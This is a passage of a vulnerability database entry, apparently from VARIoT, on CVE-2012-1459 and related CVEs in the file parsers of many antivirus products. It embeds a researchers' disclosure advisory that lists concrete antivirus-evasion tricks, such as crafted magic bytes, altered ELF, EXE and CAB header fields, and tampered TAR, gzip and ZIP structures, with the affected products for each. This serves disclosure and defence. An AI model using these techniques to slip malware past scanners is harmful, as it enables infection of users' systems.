"http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1459" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/19231" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1459" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1458" }, { "trust": 0.3, "url": "http://www.antiy.net" }, { "trust": 0.3, "url": "http://www.authentium.com" }, { "trust": 0.3, "url": "http://www.avast.com" }, { "trust": 0.3, "url": "http://www.avg.com" }, { "trust": 0.3, "url": "http://www.avira.com/" }, { "trust": 0.3, "url": "http://www.bitdefender.com" }, { "trust": 0.3, "url": "http://www.emsisoft.com/en/software/antimalware/" }, { "trust": 0.3, "url": "http://eset.com" }, { "trust": 0.3, "url": "http://www.f-prot.com/" }, { "trust": 0.3, "url": "http://www.gdatasoftware.com" }, { "trust": 0.3, "url": "http://www.ikarus.at" }, { "trust": 0.3, "url": "http://global.jiangmin.com/" }, { "trust": 0.3, "url": "http://www.k7computing.com/en/product/k7-antivirusplus.php" }, { "trust": 0.3, "url": "http://www.kaspersky.com/" }, { "trust": 0.3, "url": "http://www.mcafee.com/" }, { "trust": 0.3, "url": "http://www.microsoft.com" }, { "trust": 0.3, "url": "http://anti-virus-software-review.toptenreviews.com/norman-review.html" }, { "trust": 0.3, "url": "http://www.pctools.com/spyware-doctor-antivirus/" }, { "trust": 0.3, "url": "http://www.quickheal.com/" }, { "trust": 0.3, "url": "http://www.rising-global.com/" }, { "trust": 0.3, "url": "http://www.symantec.com" }, { "trust": 0.3, "url": "http://www.trend.com" }, { "trust": 0.3, "url": "http://anti-virus.by/en/index.shtml" }, { "trust": 0.3, "url": "/archive/1/522005" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-1482-1" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1457" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.3" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1482-3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.3" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1015405" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1015337" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1482-2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=changelog;hb=clamav-0.97.5" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1457" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1458" } ], "sources": [ { "db": "VULHUB", "id": "VHN-54740" }, { "db": "BID", "id": "52623" }, { "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "db": "PACKETSTORM", "id": "115619" }, { "db": "PACKETSTORM", "id": "113895" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-422" }, { "db": "NVD", "id": "CVE-2012-1459" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-54740" }, { "db": "BID", "id": "52623" }, { "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "db": "PACKETSTORM", "id": "115619" }, { "db": "PACKETSTORM", "id": "113895" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-422" }, { "db": "NVD", "id": "CVE-2012-1459" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-03-21T00:00:00", "db": "VULHUB", "id": "VHN-54740" }, { "date": "2012-03-20T00:00:00", "db": "BID", "id": "52623" }, { "date": "2012-03-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "date": "2012-08-17T02:36:21", "db": "PACKETSTORM", "id": "115619" }, { "date": "2012-06-20T03:33:06", "db": "PACKETSTORM", "id": "113895" }, { "date": "2012-06-20T02:54:11", "db": "PACKETSTORM", "id": "113878" }, { "date": "2012-06-19T00:56:02", "db": "PACKETSTORM", "id": "113841" }, { "date": "2012-03-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201203-422" }, { "date": "2012-03-21T10:11:49.597000", "db": "NVD", "id": "CVE-2012-1459" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-18T00:00:00", "db": "VULHUB", "id": "VHN-54740" }, { "date": "2015-04-13T22:00:00", "db": "BID", "id": "52623" }, { "date": "2012-07-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "date": "2012-04-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201203-422" }, { "date": "2024-11-21T01:37:02.073000", "db": "NVD", "id": "CVE-2012-1459" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "115619" }, { "db": "PACKETSTORM", "id": "113895" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-422" } ], "trust": 1.0 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple products TAR Vulnerability that prevents file parsers from detecting malware", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001869" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control", "sources": [ { "db": "CNNVD", "id": "CNNVD-201203-422" } ], "trust": 0.6 } }
var-201203-0367
Vulnerability from variot
The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. Multiple products RAR A file parser contains a vulnerability that can prevent malware detection. Different RAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By the attacker, MZ Has a character sequence starting with RAR Malware detection may be avoided via files. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Sophos Anti-Virus is a set of anti-virus software for various operating systems from Sophos, UK. The software detects and removes viruses, spyware, trojans and worms in real time, ensuring comprehensive network protection for desktops and laptops. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All affected products are command-line versions of the AVs.
Vulnerability Descriptions
- Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.
Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00
CVE no - CVE-2012-1419
- Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03
CVE no - CVE-2012-1420
- Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103
CVE no - CVE-2012-1421
- Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1422
- Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.
Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0
CVE no - CVE-2012-1423
- Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0
CVE no - CVE-2012-1424
- Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection.
Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004
CVE no - CVE-2012-1425
- Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1426
- Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1427
- Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1428
- Specially crafted infected ELF files with "ustar" at offset 257 evades detection.
Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01
CVE no - CVE-2012-1429 12. Specially crafted infected ELF files with "\19\04\00\10" at offset 8 evades detection.
Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1430 13. Specially crafted infected ELF files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1431
- Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1432
- Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1433
- Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1434
- Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1435
- Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1436
- Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.
Affected products - Comodo 7425
CVE no - CVE-2012-1437
- Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.
Affected products - Comodo 7425, Sophos 4.61.0
CVE no - CVE-2012-1438
- 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1439
- 'identsize' field in ELF files is parsed incorrectly. If an infected ELF file's identsize field is incremented by 1 it evades detection.
Affected products - Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1440
- 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.
Affected products - Prevx 3.0
'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',
'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and
'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1
it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0
CVE no - CVE-2012-1441
- 'class' field in ELF files is parsed incorrectly.
If an infected ELF file's class field is incremented by 1 it evades detection.
Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1442
- Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.
Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0 nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2
CVE no - CVE-2012-1443
- 'abiversion' field in ELF files is parsed incorrectly.
If an infected ELF file's abiversion field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1444
- 'abi' field in ELF files is parsed incorrectly.
If an infected ELF file's abi field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1445
- 'encoding' field in ELF files is parsed incorrectly.
If an infected ELF file's encoding field is incremented by 1 it evades detection.
Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, Symantec 20101.3.0.103, Norman 6.06.12, eSafe 7.0.017.0, Kaspersky 7.0.0.125, McAfee-GW-Edition 2010.1C, Sophos 4.61.0, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, PCTools 7.0.3.5, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1446
- 'e_version' field in ELF files is parsed incorrectly.
If an infected ELF file's e_version field is incremented by 1 it evades detection.
Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7
CVE no - CVE-2012-1447
- 'cbCabinet' field in CAB files is parsed incorrectly.
If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.
Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0 TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1
CVE no - CVE-2012-1448
- 'vMajor' field in CAB files is parsed incorrectly.
If an infected CAB file's vMajor field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1449
- 'reserved3' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1450
- 'reserved2' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved2 field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1451
- 'reserved1' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00
CVE no - CVE-2012-1452
- 'coffFiles' field in CAB files is parsed incorrectly.
If an infected CAB file's coffFiles field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C, Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402, Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1453
- 'ei_version' field in ELF files is parsed incorrectly.
If an infected ELF file's version field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1454
- 'vMinor' field in CAB files is parsed incorrectly.
If an infected CAB file's version field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1455
- A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection.
Affected products - AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004
CVE no - CVE-2012-1456
- If the length field in the header of a file with test EICAR virus included into a TAR archive is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.
Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0
CVE no - CVE-2012-1457
- A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.
If an infected CHM file's header modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.
Affected products - ClamAV 0.96.4, Sophos 4.61.0
CVE no - CVE-2012-1458
- In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.
If a TAR archive contains two files: the first one is clean, while the second is infected with test EICAR virus - and it is modified such that the length field in the header of the first, clean file to point into the middle of the header of the second, infected file. The antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, the antivirus declares the file to be clean but virus gets extracted by the gunzip+tar programs correctly by ignoring these bytes.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2
CVE no - CVE-2012-1460
- GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected .tar.gz file is broken into two streams, the antivirus declares the infected .tar.gz file to be clean while tar+gunzip extract the virus correctly
Affected products - AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2
CVE no - CVE-2012-1461
- If an infected ZIP archive is prepended with 1024 random bytes at the beginning, the antivirus declares the file to be clean but virus gets extracted by the unzip program correctly by skipping these bytes
Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103
CVE no - CVE-2012-1462
- In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for bigendian. Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5-th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.
Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7
CVE no - CVE-2012-1463
Credits
Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.
References
"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov To appear in IEEE Symposium on Security and Privacy 2012 http://www.ieee-security.org/TC/SP2012/
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0367", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "antivirus", "scope": "eq", "trust": 2.1, "vendor": "comodo", "version": "7424" }, { "model": "avl sdk", "scope": "eq", "trust": 1.8, "vendor": "antiy", "version": "2.0.3.7" }, { "model": "command antivirus", "scope": "eq", "trust": 1.8, "vendor": "authentium", "version": "5.2.11.5" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "avg", "version": "10.0.0.1190" }, { "model": "bitdefender", "scope": "eq", "trust": 1.8, "vendor": "bitdefender", "version": "7.2" }, { "model": "clamav", "scope": "eq", "trust": 1.8, "vendor": "clamav", "version": "0.96.4" }, { "model": "anti-malware", "scope": "eq", "trust": 1.8, "vendor": "emsisoft", "version": "5.1.0.1" }, { "model": "virus utilities t3 command line scanner", "scope": "eq", "trust": 1.8, "vendor": "ikarus", "version": "1.1.97.0" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "jiangmin", "version": "13.0.900" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "pc tools", "version": "7.0.3.5" }, { "model": "virusbuster", "scope": "eq", "trust": 1.8, "vendor": "virusbuster", "version": "13.6.151.0" }, { "model": "esafe", "scope": "eq", "trust": 1.8, "vendor": "aladdin", "version": "7.0.17.0" }, { "model": "f-secure anti-virus", "scope": "eq", "trust": 1.8, "vendor": "f secure", "version": "9.0.16160.0" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "kaspersky", "version": "7.0.0.125" }, { "model": "anti-virus", "scope": "eq", "trust": 1.8, "vendor": "sophos", "version": "4.61.0" }, { "model": "antivirus", "scope": "eq", "trust": 1.8, "vendor": "fortinet", "version": "4.2.254.0" }, { "model": "security essentials", "scope": "eq", "trust": 1.8, "vendor": "microsoft", "version": "2.0" }, { "model": "scan engine", "scope": "eq", "trust": 1.8, "vendor": "mcafee", "version": "5.400.0.1158" }, { "model": "endpoint protection", "scope": "eq", "trust": 1.6, 